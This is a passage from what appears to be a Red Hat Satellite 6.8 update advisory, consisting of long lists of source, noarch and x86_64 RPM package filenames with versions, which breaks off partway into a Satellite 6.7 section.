m\npython-mongoengine-0.10.5-2.el7sat.src.rpm\npython-nectar-1.6.2-1.el7sat.src.rpm\npython-oauth2-1.5.211-8.el7sat.src.rpm\npython-okaara-1.0.37-2.el7sat.src.rpm\npython-pexpect-4.6-1.el7at.src.rpm\npython-psutil-5.0.1-3.el7sat.src.rpm\npython-ptyprocess-0.5.2-3.el7at.src.rpm\npython-pycurl-7.43.0.2-4.el7sat.src.rpm\npython-pymongo-3.2-2.el7sat.src.rpm\npython-qpid-1.35.0-5.el7.src.rpm\npython-semantic_version-2.2.0-6.el7sat.src.rpm\npython-simplejson-3.2.0-1.el7sat.src.rpm\npython-twisted-16.4.1-12.el7sat.src.rpm\npython-vine-1.1.3-6.el7sat.src.rpm\npython-werkzeug-0.12.2-5.el7sat.src.rpm\npython-zope-interface-4.0.5-4.el7.src.rpm\nqpid-cpp-1.36.0-28.el7amq.src.rpm\nqpid-dispatch-1.5.0-4.el7.src.rpm\nqpid-proton-0.28.0-3.el7.src.rpm\nredhat-access-insights-puppet-1.0.1-1.el7sat.src.rpm\nrepoview-0.6.6-11.el7sat.src.rpm\nrubygem-fast_gettext-1.1.0-4.el7sat.src.rpm\nrubygem-highline-1.7.8-3.el7sat.src.rpm\nrubygem-newt-0.9.6-3.el7sat.src.rpm\nrubygem-oauth-0.5.4-2.el7sat.src.rpm\nsaslwrapper-0.22-5.el7sat.src.rpm\nsatellite-6.8.0-1.el7sat.src.rpm\nsatellite-installer-6.8.0.11-1.el7sat.src.rpm\ntfm-6.1-1.el7sat.src.rpm\ntfm-rubygem-algebrick-0.7.3-6.el7sat.src.rpm\ntfm-rubygem-ansi-1.5.0-2.el7sat.src.rpm\ntfm-rubygem-apipie-params-0.0.5-5.el7sat.src.rpm\ntfm-rubygem-bundler_ext-0.4.1-4.el7sat.src.rpm\ntfm-rubygem-clamp-1.1.2-5.el7sat.src.rpm\ntfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.src.rpm\ntfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.src.rpm\ntfm-rubygem-domain_name-0.5.20160310-4.el7sat.src.rpm\ntfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-faraday-0.15.4-1.el7sat.src.rpm\ntfm-rubygem-faraday_middleware-0.13.1-2.el7sat.src.rpm\ntfm-rubygem-ffi-1.12.2-1.el7sat.src.rpm\ntfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.src.rpm\ntfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.src.rpm\ntfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.src.rpm\ntfm-rubygem-gssapi-1.2.0-6.el7sat.src.rpm\ntfm-rubygem-hashie-3.6.0-1.el7sat.src.rpm\ntfm-rubygem-highline-1.7.8-4.el7sat.src.rpm\ntfm-rubygem-http-cookie-1.0.2-5.el7sat.src.rpm\ntfm-rubygem-infoblox-3.0.0-3.el7sat.src.rpm\ntfm-rubygem-journald-logger-2.0.4-2.el7sat.src.rpm\ntfm-rubygem-journald-native-1.0.11-2.el7sat.src.rpm\ntfm-rubygem-jwt-2.2.1-1.el7sat.src.rpm\ntfm-rubygem-kafo-4.1.0-3.el7sat.src.rpm\ntfm-rubygem-kafo_parsers-1.1.0-3.el7sat.src.rpm\ntfm-rubygem-kafo_wizards-0.0.1-4.el7sat.src.rpm\ntfm-rubygem-little-plugger-1.1.4-1.el7sat.src.rpm\ntfm-rubygem-logging-2.2.2-6.el7sat.src.rpm\ntfm-rubygem-logging-journald-2.0.0-2.el7sat.src.rpm\ntfm-rubygem-mime-types-3.2.2-4.el7sat.src.rpm\ntfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.src.rpm\ntfm-rubygem-multi_json-1.14.1-1.el7sat.src.rpm\ntfm-rubygem-multipart-post-2.0.0-1.el7sat.src.rpm\ntfm-rubygem-mustermann-1.0.2-4.el7sat.src.rpm\ntfm-rubygem-net-ssh-4.2.0-1.el7sat.src.rpm\ntfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.src.rpm\ntfm-rubygem-netrc-0.11.0-3.el7sat.src.rpm\ntfm-rubygem-openscap-0.4.9-3.el7sat.src.rpm\ntfm-rubygem-powerbar-2.0.1-2.el7sat.src.rpm\ntfm-rubygem-rack-2.2.3-1.el7sat.src.rpm\ntfm-rubygem-rack-protection-2.0.3-4.el7sat.src.rpm\ntfm-rubygem-rb-inotify-0.9.7-5.el7sat.src.rpm\ntfm-rubygem-rest-client-2.0.2-3.el7sat.src.rpm\ntfm-rubygem-rkerberos-0.1.5-18.el7sat.src.rpm\ntfm-rubygem-rsec-0.4.3-4.el7sat.src.rpm\ntfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.src.rpm\ntfm-rubygem-rubyipmi-0.10.0-6.el7sat.src.rpm\ntfm-rubygem-sequel-5.7.1-2.el7sat.src.rpm\ntfm-rubygem-sinatra-2.0.3-4.el7sat.src.rpm\ntfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.src.rpm\ntfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.src.rpm\ntfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.src.rpm\ntfm-rubygem-sqlite3-1.3.13-5.el7sat.src.rpm\ntfm-rubygem-statsd-instrument-2.1.4-2.el7sat.src.rpm\ntfm-rubygem-tilt-2.0.8-4.el7sat.src.rpm\ntfm-rubygem-unf-0.1.3-7.el7sat.src.rpm\ntfm-rubygem-unf_ext-0.0.7.2-1.el7sat.src.rpm\ntfm-rubygem-xmlrpc-0.3.0-2.el7sat.src.rpm\n\nnoarch:\nansible-collection-redhat-satellite-1.3.0-1.el7sat.noarch.rpm\nansible-runner-1.4.6-1.el7ar.noarch.rpm\nansiblerole-foreman_scap_client-0.0.5-1.el7sat.noarch.rpm\nansiblerole-insights-client-1.7.1-1.el7sat.noarch.rpm\nansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.noarch.rpm\ncrane-selinux-3.4.0-1.el7sat.noarch.rpm\nforeman-bootloaders-redhat-202005201200-1.el7sat.noarch.rpm\nforeman-bootloaders-redhat-tftpboot-202005201200-1.el7sat.noarch.rpm\nforeman-debug-2.1.2.19-1.el7sat.noarch.rpm\nforeman-discovery-image-3.6.7-1.el7sat.noarch.rpm\nforeman-installer-2.1.2.8-1.el7sat.noarch.rpm\nforeman-installer-katello-2.1.2.8-1.el7sat.noarch.rpm\nforeman-proxy-2.1.2-2.el7sat.noarch.rpm\nforeman-proxy-content-3.16.0-1.el7sat.noarch.rpm\nforeman-proxy-journald-2.1.2-2.el7sat.noarch.rpm\nkatello-certs-tools-2.7.1-1.el7sat.noarch.rpm\nkatello-client-bootstrap-1.7.5-1.el7sat.noarch.rpm\nkatello-common-3.16.0-1.el7sat.noarch.rpm\nkatello-debug-3.16.0-1.el7sat.noarch.rpm\nkobo-0.5.1-1.el7sat.noarch.rpm\npulp-admin-client-2.21.3-1.el7sat.noarch.rpm\npulp-docker-admin-extensions-3.2.7-1.el7sat.noarch.rpm\npulp-docker-plugins-3.2.7-1.el7sat.noarch.rpm\npulp-katello-1.0.3-1.el7sat.noarch.rpm\npulp-maintenance-2.21.3-1.el7sat.noarch.rpm\npulp-nodes-child-2.21.3-1.el7sat.noarch.rpm\npulp-nodes-common-2.21.3-1.el7sat.noarch.rpm\npulp-nodes-parent-2.21.3-1.el7sat.noarch.rpm\npulp-ostree-admin-extensions-1.3.1-2.el7sat.noarch.rpm\npulp-ostree-plugins-1.3.1-2.el7sat.noarch.rpm\npulp-puppet-admin-extensions-2.21.3-2.el7sat.noarch.rpm\npulp-puppet-plugins-2.21.3-2.el7sat.noarch.rpm\npulp-rpm-admin-extensions-2.21.3-2.el7sat.noarch.rpm\npulp-rpm-plugins-2.21.3-2.el7sat.noarch.rpm\npulp-selinux-2.21.3-1.el7sat.noarch.rpm\npulp-server-2.21.3-1.el7sat.noarch.rpm\npuppet-agent-oauth-0.5.1-3.el7sat.noarch.rpm\npuppet-foreman_scap_client-0.4.0-1.el7sat.noarch.rpm\npuppetlabs-stdlib-4.25.1-2.el7sat.noarch.rpm\npuppetserver-6.13.0-1.el7sat.noarch.rpm\npython-blinker-1.3-2.el7sat.noarch.rpm\npython-gnupg-0.3.7-1.el7ui.noarch.rpm\npython-gofer-2.12.5-7.el7sat.noarch.rpm\npython-gofer-qpid-2.12.5-7.el7sat.noarch.rpm\npython-kid-0.9.6-11.el7sat.noarch.rpm\npython-mongoengine-0.10.5-2.el7sat.noarch.rpm\npython-nectar-1.6.2-1.el7sat.noarch.rpm\npython-oauth2-1.5.211-8.el7sat.noarch.rpm\npython-pulp-agent-lib-2.21.3-1.el7sat.noarch.rpm\npython-pulp-bindings-2.21.3-1.el7sat.noarch.rpm\npython-pulp-client-lib-2.21.3-1.el7sat.noarch.rpm\npython-pulp-common-2.21.3-1.el7sat.noarch.rpm\npython-pulp-docker-common-3.2.7-1.el7sat.noarch.rpm\npython-pulp-integrity-2.21.3-2.el7sat.noarch.rpm\npython-pulp-oid_validation-2.21.3-1.el7sat.noarch.rpm\npython-pulp-ostree-common-1.3.1-2.el7sat.noarch.rpm\npython-pulp-puppet-common-2.21.3-2.el7sat.noarch.rpm\npython-pulp-repoauth-2.21.3-1.el7sat.noarch.rpm\npython-pulp-rpm-common-2.21.3-2.el7sat.noarch.rpm\npython-pulp-streamer-2.21.3-1.el7sat.noarch.rpm\npython-qpid-1.35.0-5.el7.noarch.rpm\npython-semantic_version-2.2.0-6.el7sat.noarch.rpm\npython2-amqp-2.2.2-5.el7sat.noarch.rpm\npython2-ansible-runner-1.4.6-1.el7ar.noarch.rpm\npython2-anyjson-0.3.3-11.el7sat.noarch.rpm\npython2-apypie-0.2.2-1.el7sat.noarch.rpm\npython2-celery-4.0.2-9.el7sat.noarch.rpm\npython2-click-6.7-9.el7sat.noarch.rpm\npython2-crane-3.3.1-9.el7sat.noarch.rpm\npython2-daemon-2.1.2-7.el7at.noarch.rpm\npython2-django-1.11.29-1.el7sat.noarch.rpm\npython2-flask-0.12.2-4.el7sat.noarch.rpm\npython2-future-0.16.0-11.el7sat.noarch.rpm\npython2-isodate-0.5.4-12.el7sat.noarch.rpm\npython2-itsdangerous-0.24-15.el7sat.noarch.rpm\npython2-jinja2-2.10-10.el7sat.noarch.rpm\npython2-jmespath-0.9.0-6.el7_7.noarch.rpm\npython2-kombu-4.0.2-13.el7sat.noarch.rpm\npython2-lockfile-0.11.0-10.el7ar.noarch.rpm\npython2-okaara-1.0.37-2.el7sat.noarch.rpm\npython2-pexpect-4.6-1.el7at.noarch.rpm\npython2-ptyprocess-0.5.2-3.el7at.noarch.rpm\npython2-vine-1.1.3-6.el7sat.noarch.rpm\npython2-werkzeug-0.12.2-5.el7sat.noarch.rpm\nqpid-dispatch-tools-1.5.0-4.el7.noarch.rpm\nqpid-tools-1.36.0-28.el7amq.noarch.rpm\nredhat-access-insights-puppet-1.0.1-1.el7sat.noarch.rpm\nrepoview-0.6.6-11.el7sat.noarch.rpm\nrubygem-fast_gettext-1.1.0-4.el7sat.noarch.rpm\nrubygem-highline-1.7.8-3.el7sat.noarch.rpm\nrubygem-oauth-0.5.4-2.el7sat.noarch.rpm\nsatellite-capsule-6.8.0-1.el7sat.noarch.rpm\nsatellite-common-6.8.0-1.el7sat.noarch.rpm\nsatellite-debug-tools-6.8.0-1.el7sat.noarch.rpm\nsatellite-installer-6.8.0.11-1.el7sat.noarch.rpm\ntfm-rubygem-algebrick-0.7.3-6.el7sat.noarch.rpm\ntfm-rubygem-ansi-1.5.0-2.el7sat.noarch.rpm\ntfm-rubygem-apipie-params-0.0.5-5.el7sat.noarch.rpm\ntfm-rubygem-bundler_ext-0.4.1-4.el7sat.noarch.rpm\ntfm-rubygem-clamp-1.1.2-5.el7sat.noarch.rpm\ntfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.noarch.rpm\ntfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.noarch.rpm\ntfm-rubygem-domain_name-0.5.20160310-4.el7sat.noarch.rpm\ntfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-faraday-0.15.4-1.el7sat.noarch.rpm\ntfm-rubygem-faraday_middleware-0.13.1-2.el7sat.noarch.rpm\ntfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-gssapi-1.2.0-6.el7sat.noarch.rpm\ntfm-rubygem-hashie-3.6.0-1.el7sat.noarch.rpm\ntfm-rubygem-highline-1.7.8-4.el7sat.noarch.rpm\ntfm-rubygem-http-cookie-1.0.2-5.el7sat.noarch.rpm\ntfm-rubygem-infoblox-3.0.0-3.el7sat.noarch.rpm\ntfm-rubygem-journald-logger-2.0.4-2.el7sat.noarch.rpm\ntfm-rubygem-jwt-2.2.1-1.el7sat.noarch.rpm\ntfm-rubygem-kafo-4.1.0-3.el7sat.noarch.rpm\ntfm-rubygem-kafo_parsers-1.1.0-3.el7sat.noarch.rpm\ntfm-rubygem-kafo_wizards-0.0.1-4.el7sat.noarch.rpm\ntfm-rubygem-little-plugger-1.1.4-1.el7sat.noarch.rpm\ntfm-rubygem-logging-2.2.2-6.el7sat.noarch.rpm\ntfm-rubygem-logging-journald-2.0.0-2.el7sat.noarch.rpm\ntfm-rubygem-mime-types-3.2.2-4.el7sat.noarch.rpm\ntfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.noarch.rpm\ntfm-rubygem-multi_json-1.14.1-1.el7sat.noarch.rpm\ntfm-rubygem-multipart-post-2.0.0-1.el7sat.noarch.rpm\ntfm-rubygem-mustermann-1.0.2-4.el7sat.noarch.rpm\ntfm-rubygem-net-ssh-4.2.0-1.el7sat.noarch.rpm\ntfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.noarch.rpm\ntfm-rubygem-netrc-0.11.0-3.el7sat.noarch.rpm\ntfm-rubygem-openscap-0.4.9-3.el7sat.noarch.rpm\ntfm-rubygem-powerbar-2.0.1-2.el7sat.noarch.rpm\ntfm-rubygem-rack-2.2.3-1.el7sat.noarch.rpm\ntfm-rubygem-rack-protection-2.0.3-4.el7sat.noarch.rpm\ntfm-rubygem-rb-inotify-0.9.7-5.el7sat.noarch.rpm\ntfm-rubygem-rest-client-2.0.2-3.el7sat.noarch.rpm\ntfm-rubygem-rsec-0.4.3-4.el7sat.noarch.rpm\ntfm-rubygem-rubyipmi-0.10.0-6.el7sat.noarch.rpm\ntfm-rubygem-sequel-5.7.1-2.el7sat.noarch.rpm\ntfm-rubygem-sinatra-2.0.3-4.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.noarch.rpm\ntfm-rubygem-statsd-instrument-2.1.4-2.el7sat.noarch.rpm\ntfm-rubygem-tilt-2.0.8-4.el7sat.noarch.rpm\ntfm-rubygem-unf-0.1.3-7.el7sat.noarch.rpm\ntfm-rubygem-xmlrpc-0.3.0-2.el7sat.noarch.rpm\n\nx86_64:\ncreaterepo_c-0.7.4-1.el7sat.x86_64.rpm\ncreaterepo_c-debuginfo-0.7.4-1.el7sat.x86_64.rpm\ncreaterepo_c-libs-0.7.4-1.el7sat.x86_64.rpm\nforeman-discovery-image-service-1.0.0-3.el7sat.x86_64.rpm\nforeman-discovery-image-service-tui-1.0.0-3.el7sat.x86_64.rpm\nhfsplus-tools-332.14-12.el7.x86_64.rpm\nhfsplus-tools-debuginfo-332.14-12.el7.x86_64.rpm\nlibmodulemd-1.7.0-1.pulp.el7sat.x86_64.rpm\nlibmodulemd-debuginfo-1.7.0-1.pulp.el7sat.x86_64.rpm\nlibsolv-0.7.4-4.pulp.el7sat.x86_64.rpm\nlibsolv-debuginfo-0.7.4-4.pulp.el7sat.x86_64.rpm\nlibwebsockets-2.4.2-2.el7.x86_64.rpm\nlibwebsockets-debuginfo-2.4.2-2.el7.x86_64.rpm\nlivecd-tools-20.4-1.6.el7sat.x86_64.rpm\nmod_xsendfile-0.12-11.el7sat.x86_64.rpm\nmod_xsendfile-debuginfo-0.12-11.el7sat.x86_64.rpm\nostree-2017.1-2.atomic.el7.x86_64.rpm\nostree-debuginfo-2017.1-2.atomic.el7.x86_64.rpm\npuppet-agent-6.14.0-2.el7sat.x86_64.rpm\npycairo-1.16.3-9.el7sat.x86_64.rpm\npycairo-debuginfo-1.16.3-9.el7sat.x86_64.rpm\npygobject3-debuginfo-3.28.3-2.el7sat.x86_64.rpm\npython-billiard-debuginfo-3.5.0.3-3.el7sat.x86_64.rpm\npython-bson-3.2-2.el7sat.x86_64.rpm\npython-imgcreate-20.4-1.6.el7sat.x86_64.rpm\npython-markupsafe-debuginfo-0.23-21.el7sat.x86_64.rpm\npython-psutil-5.0.1-3.el7sat.x86_64.rpm\npython-psutil-debuginfo-5.0.1-3.el7sat.x86_64.rpm\npython-pycurl-debuginfo-7.43.0.2-4.el7sat.x86_64.rpm\npython-pymongo-3.2-2.el7sat.x86_64.rpm\npython-pymongo-debuginfo-3.2-2.el7sat.x86_64.rpm\npython-pymongo-gridfs-3.2-2.el7sat.x86_64.rpm\npython-qpid-proton-0.28.0-3.el7.x86_64.rpm\npython-qpid-qmf-1.36.0-28.el7amq.x86_64.rpm\npython-saslwrapper-0.22-5.el7sat.x86_64.rpm\npython-simplejson-3.2.0-1.el7sat.x86_64.rpm\npython-simplejson-debuginfo-3.2.0-1.el7sat.x86_64.rpm\npython-twisted-debuginfo-16.4.1-12.el7sat.x86_64.rpm\npython-zope-interface-4.0.5-4.el7.x86_64.rpm\npython-zope-interface-debuginfo-4.0.5-4.el7.x86_64.rpm\npython2-billiard-3.5.0.3-3.el7sat.x86_64.rpm\npython2-gobject-3.28.3-2.el7sat.x86_64.rpm\npython2-gobject-base-3.28.3-2.el7sat.x86_64.rpm\npython2-markupsafe-0.23-21.el7sat.x86_64.rpm\npython2-pycurl-7.43.0.2-4.el7sat.x86_64.rpm\npython2-solv-0.7.4-4.pulp.el7sat.x86_64.rpm\npython2-twisted-16.4.1-12.el7sat.x86_64.rpm\nqpid-cpp-client-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-debuginfo-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-server-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-server-linearstore-1.36.0-28.el7amq.x86_64.rpm\nqpid-dispatch-debuginfo-1.5.0-4.el7.x86_64.rpm\nqpid-dispatch-router-1.5.0-4.el7.x86_64.rpm\nqpid-proton-c-0.28.0-3.el7.x86_64.rpm\nqpid-proton-debuginfo-0.28.0-3.el7.x86_64.rpm\nqpid-qmf-1.36.0-28.el7amq.x86_64.rpm\nrubygem-newt-0.9.6-3.el7sat.x86_64.rpm\nrubygem-newt-debuginfo-0.9.6-3.el7sat.x86_64.rpm\nsaslwrapper-0.22-5.el7sat.x86_64.rpm\nsaslwrapper-debuginfo-0.22-5.el7sat.x86_64.rpm\ntfm-rubygem-ffi-1.12.2-1.el7sat.x86_64.rpm\ntfm-rubygem-ffi-debuginfo-1.12.2-1.el7sat.x86_64.rpm\ntfm-rubygem-journald-native-1.0.11-2.el7sat.x86_64.rpm\ntfm-rubygem-journald-native-debuginfo-1.0.11-2.el7sat.x86_64.rpm\ntfm-rubygem-rkerberos-0.1.5-18.el7sat.x86_64.rpm\ntfm-rubygem-rkerberos-debuginfo-0.1.5-18.el7sat.x86_64.rpm\ntfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.x86_64.rpm\ntfm-rubygem-ruby-libvirt-debuginfo-0.7.0-4.el7sat.x86_64.rpm\ntfm-rubygem-sqlite3-1.3.13-5.el7sat.x86_64.rpm\ntfm-rubygem-sqlite3-debuginfo-1.3.13-5.el7sat.x86_64.rpm\ntfm-rubygem-unf_ext-0.0.7.2-1.el7sat.x86_64.rpm\ntfm-rubygem-unf_ext-debuginfo-0.0.7.2-1.el7sat.x86_64.rpm\ntfm-runtime-6.1-1.el7sat.x86_64.rpm\n\nRed Hat Satellite 6.7:\n\nSource:\nansible-collection-redhat-satellite-1.3.0-1.el7sat.src.rpm\nansible-runner-1.4.6-1.el7ar.src.rpm\nansiblerole-foreman_scap_client-0.0.5-1.el7sat.src.rpm\nansiblerole-insights-client-1.7.1-1.el7sat.src.rpm\nansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.src.rpm\ncandlepin-3.1.21-1.el7sat.src.rpm\ncreaterepo_c-0.7.4-1.el7sat.src.rpm\nforeman-2.1.2.19-1.el7sat.src.rpm\nforeman-bootloaders-redhat-202005201200-1.el7sat.src.rpm\nforeman-discovery-image-3.6.7-1.el7sat.src.rpm\nforeman-discovery-image-service-1.0.0-3.el7sat.src.rpm\nforeman-installer-2.1.2.8-1.el7sat.src.rpm\nforeman-proxy-2.1.2-2.el7sat.src.rpm\nforeman-selinux-2.1.2.3-1.el7sat.src.rpm\nfuture-0.16.0-11.el7sat.src.rpm\ngofer-2.12.5-7.el7sat.src.rpm\nhfsplus-tools-332.14-12.el7.src.rpm\nkatello-3.16.0-1.el7sat.src.rpm\nkatello-certs-tools-2.7.1-1.el7sat.src.rpm\nkatello-client-bootstrap-1.7.5-1.el7sat.src.rpm\nkatello-selinux-3.4.0-1.el7sat.src.rpm\nkeycloak-httpd-client-install-1.2.2-1.el7sat.src.rpm\nkobo-0.5.1-1.el7sat.src.rpm\nlibmodulemd-1.7.0-1.pulp.el7sat.src.rpm\nlibsolv-0.7.4-4.pulp.el7sat.src.rpm\nlibwebsockets-2.4.2-2.el7.src.rpm\nlivecd-tools-20.4-1.6.el7sat.src.rpm\nmod_xsendfile-0.12-11.el7sat.src.rpm\nostree-2017.1-2.atomic.el7.src.rpm\npcp-mmvstatsd-0.4-2.el7sat.src.rpm\npulp-2.21.3-1.el7sat.src.rpm\npulp-docker-3.2.7-1.el7sat.src.rpm\npulp-katello-1.0.3-1.el7sat.src.rpm\npulp-ostree-1.3.1-2.el7sat.src.rpm\npulp-puppet-2.21.3-2.el7sat.src.rpm\npulp-rpm-2.21.3-2.el7sat.src.rpm\npuppet-agent-6.14.0-2.el7sat.src.rpm\npuppet-agent-oauth-0.5.1-3.el7sat.src.rpm\npuppet-foreman_scap_client-0.4.0-1.el7sat.src.rpm\npuppetlabs-stdlib-4.25.1-2.el7sat.src.rpm\npuppetserver-6.13.0-1.el7sat.src.rpm\npycairo-1.16.3-9.el7sat.src.rpm\npygobject3-3.28.3-2.el7sat.src.rpm\npython-aiohttp-3.6.2-4.el7ar.src.rpm\npython-amqp-2.2.2-5.el7sat.src.rpm\npython-anyjson-0.3.3-11.el7sat.src.rpm\npython-apypie-0.2.2-1.el7sat.src.rpm\npython-async-timeout-3.0.1-2.el7ar.src.rpm\npython-attrs-19.3.0-3.el7ar.src.rpm\npython-billiard-3.5.0.3-3.el7sat.src.rpm\npython-blinker-1.3-2.el7sat.src.rpm\npython-celery-4.0.2-9.el7sat.src.rpm\npython-chardet-3.0.4-10.el7ar.src.rpm\npython-click-6.7-9.el7sat.src.rpm\npython-crane-3.3.1-9.el7sat.src.rpm\npython-daemon-2.1.2-7.el7at.src.rpm\npython-dateutil-2.8.1-2.el7ar.src.rpm\npython-django-1.11.29-1.el7sat.src.rpm\npython-flask-0.12.2-4.el7sat.src.rpm\npython-gnupg-0.3.7-1.el7ui.src.rpm\npython-idna-2.4-2.el7ar.src.rpm\npython-idna-ssl-1.1.0-2.el7ar.src.rpm\npython-isodate-0.5.4-12.el7sat.src.rpm\npython-itsdangerous-0.24-15.el7sat.src.rpm\npython-jinja2-2.10-10.el7sat.src.rpm\npython-jmespath-0.9.0-6.el7_7.src.rpm\npython-kid-0.9.6-11.el7sat.src.rpm\npython-kombu-4.0.2-13.el7sat.src.rpm\npython-lockfile-0.11.0-10.el7ar.src.rpm\npython-markupsafe-0.23-21.el7sat.src.rpm\npython-mongoengine-0.10.5-2.el7sat.src.rpm\npython-multidict-4.7.4-2.el7ar.src.rpm\npython-nectar-1.6.2-1.el7sat.src.rpm\npython-oauth2-1.5.211-8.el7sat.src.rpm\npython-okaara-1.0.37-2.el7sat.src.rpm\npython-pexpect-4.6-1.el7at.src.rpm\npython-prometheus-client-0.7.1-2.el7ar.src.rpm\npython-psutil-5.0.1-3.el7sat.src.rpm\npython-ptyprocess-0.5.2-3.el7at.src.rpm\npython-pycurl-7.43.0.2-4.el7sat.src.rpm\npython-pymongo-3.2-2.el7sat.src.rpm\npython-qpid-1.35.0-5.el7.src.rpm\npython-receptor-satellite-1.2.0-1.el7sat.src.rpm\npython-semantic_version-2.2.0-6.el7sat.src.rpm\npython-simplejson-3.2.0-1.el7sat.src.rpm\npython-six-1.11.0-8.el7ar.src.rpm\npython-twisted-16.4.1-12.el7sat.src.rpm\npython-typing-extensions-3.7.4.1-2.el7ar.src.rpm\npython-vine-1.1.3-6.el7sat.src.rpm\npython-werkzeug-0.12.2-5.el7sat.src.rpm\npython-yarl-1.4.2-2.el7ar.src.rpm\npython-zope-interface-4.0.5-4.el7.src.rpm\nqpid-cpp-1.36.0-28.el7amq.src.rpm\nqpid-dispatch-1.5.0-4.el7.src.rpm\nqpid-proton-0.28.0-3.el7.src.rpm\nreceptor-0.6.3-1.el7ar.src.rpm\nredhat-access-insights-puppet-1.0.1-1.el7sat.src.rpm\nrepoview-0.6.6-11.el7sat.src.rpm\nrh-postgresql12-postgresql-evr-0.0.2-1.el7sat.src.rpm\nrhel8-kickstart-setup-0.0.2-1.el7sat.src.rpm\nrubygem-facter-2.4.1-2.el7sat.src.rpm\nrubygem-fast_gettext-1.1.0-4.el7sat.src.rpm\nrubygem-foreman_scap_client-0.4.6-1.el7sat.src.rpm\nrubygem-highline-1.7.8-3.el7sat.src.rpm\nrubygem-newt-0.9.6-3.el7sat.src.rpm\nrubygem-oauth-0.5.4-2.el7sat.src.rpm\nrubygem-passenger-4.0.18-24.el7sat.src.rpm\nrubygem-rack-1.6.12-1.el7sat.src.rpm\nrubygem-rake-0.9.2.2-41.el7sat.src.rpm\nsaslwrapper-0.22-5.el7sat.src.rpm\nsatellite-6.8.0-1.el7sat.src.rpm\nsatellite-installer-6.8.0.11-1.el7sat.src.rpm\ntfm-6.1-1.el7sat.src.rpm\ntfm-rubygem-actioncable-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actionmailbox-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actionmailer-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actionpack-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actiontext-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actionview-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activejob-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activemodel-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activerecord-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activerecord-import-1.0.0-6.el7sat.src.rpm\ntfm-rubygem-activerecord-session_store-1.1.1-4.el7sat.src.rpm\ntfm-rubygem-activestorage-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activesupport-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-addressable-2.6.0-1.el7sat.src.rpm\ntfm-rubygem-algebrick-0.7.3-6.el7sat.src.rpm\ntfm-rubygem-amazing_print-1.1.0-1.el7sat.src.rpm\ntfm-rubygem-ancestry-3.0.7-1.el7sat.src.rpm\ntfm-rubygem-anemone-0.7.2-22.el7sat.src.rpm\ntfm-rubygem-angular-rails-templates-1.1.0-1.el7sat.src.rpm\ntfm-rubygem-ansi-1.5.0-2.el7sat.src.rpm\ntfm-rubygem-apipie-bindings-0.3.0-1.el7sat.src.rpm\ntfm-rubygem-apipie-dsl-2.2.2-2.el7sat.src.rpm\ntfm-rubygem-apipie-params-0.0.5-5.el7sat.src.rpm\ntfm-rubygem-apipie-rails-0.5.17-3.el7sat.src.rpm\ntf